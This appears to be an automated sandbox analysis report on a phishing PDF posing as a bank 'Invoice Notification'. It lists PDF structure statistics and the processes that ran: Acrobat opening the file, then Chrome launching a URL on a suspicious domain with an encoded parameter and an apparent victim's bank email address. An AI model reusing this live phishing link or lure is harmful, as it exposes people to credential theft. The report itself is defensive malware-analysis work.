                                            TLSH:A7F29E70A89C0C7DF8868775997C340B446D76638DE060F2306A4FD66CF89D4A9B3EA7
                                            File Content Preview:%PDF-1.4.1 0 obj.<<./Title (...I.n.v.o.i.c.e. .N.o.t.i.f.i.c.a.t.i.o.n)./Creator (...w.k.h.t.m.l.t.o.p.d.f. .0...1.2...6)./Producer (...Q.t. .4...8...7)./CreationDate (D:20241113224717-08'00').>>.endobj.3 0 obj.<<./Type /ExtGState./SA true./SM 0.02./ca 1.

                                            File Icon

                                            Icon Hash:62cc8caeb29e8ae0

                                            Static PDF Info

                                            General

                                            Header:%PDF-1.4
                                            Total Entropy:7.789027
                                            Total Bytes:34633
                                            Stream Entropy:7.911108
                                            Stream Bytes:29264
                                            Entropy outside Streams:5.234734
                                            Bytes outside Streams:5369
                                            Number of EOF found:1
                                            Bytes after EOF:

                                            Keywords Statistics

                                            NameCount
                                            obj39
                                            endobj39
                                            stream11
                                            endstream11
                                            xref1
                                            trailer1
                                            startxref1
                                            /Page1
                                            /Encrypt0
                                            /ObjStm0
                                            /URI2
                                            /JS0
                                            /JavaScript0
                                            /AA0
                                            /OpenAction0
                                            /AcroForm0
                                            /JBIG2Decode0
                                            /RichMedia0
                                            /Launch0
                                            /EmbeddedFile0

                                            Image Streams

                                            IDDHASHMD5Preview
                                            68282828282828280997b0a66c248cbd54a9d56d549887da1
                                            8000000000000000050dcf8dec76f75ff9385d70d9f9f9ec7
                                            10e0008000008000e08778b1324e33288cf24019020fe6b741
                                            128a35b4b730ccd3b4f1d332a6ab9df49dccd522c9755d7b77
                                            15515a525e17b2998058811bc8871b5aa40671c69375f88874

                                            Network Behavior

                                            No network behavior found

                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:04:28:07
                                            Start date:14/11/2024
                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Updated_Proposal_20241113_pdf_banca.pdf"
                                            Imagebase:0x7ff6bc1b0000
                                            File size:5'641'176 bytes
                                            MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:1
                                            Start time:04:28:08
                                            Start date:14/11/2024
                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                            Imagebase:0x7ff74bb60000
                                            File size:3'581'912 bytes
                                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:04:28:08
                                            Start date:14/11/2024
                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1384,i,12974326492354929419,14040274795783035196,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                            Imagebase:0x7ff74bb60000
                                            File size:3'581'912 bytes
                                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:9
                                            Start time:04:28:32
                                            Start date:14/11/2024
                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://www.shop4myhealth.ukyb.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPWF6QkxZV289JnVpZD1VU0VSMDEwNzIwMjRVTklRVUUwMjE4MDcwMTEwMjAyNDIwMjQwNzAxMTgwMjEwN0123Ndiana.panaccione@banca.mps.it"
                                            Imagebase:0x7ff76e190000
                                            File size:3'242'272 bytes
                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:10
                                            Start time:04:28:32
                                            Start date:14/11/2024
                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1920,i,5273971204665831357,13377854627728883333,262144 /prefetch:8
                                            Imagebase:0x7ff76e190000
                                            File size:3'242'272 bytes
                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Disassembly

                                            No disassembly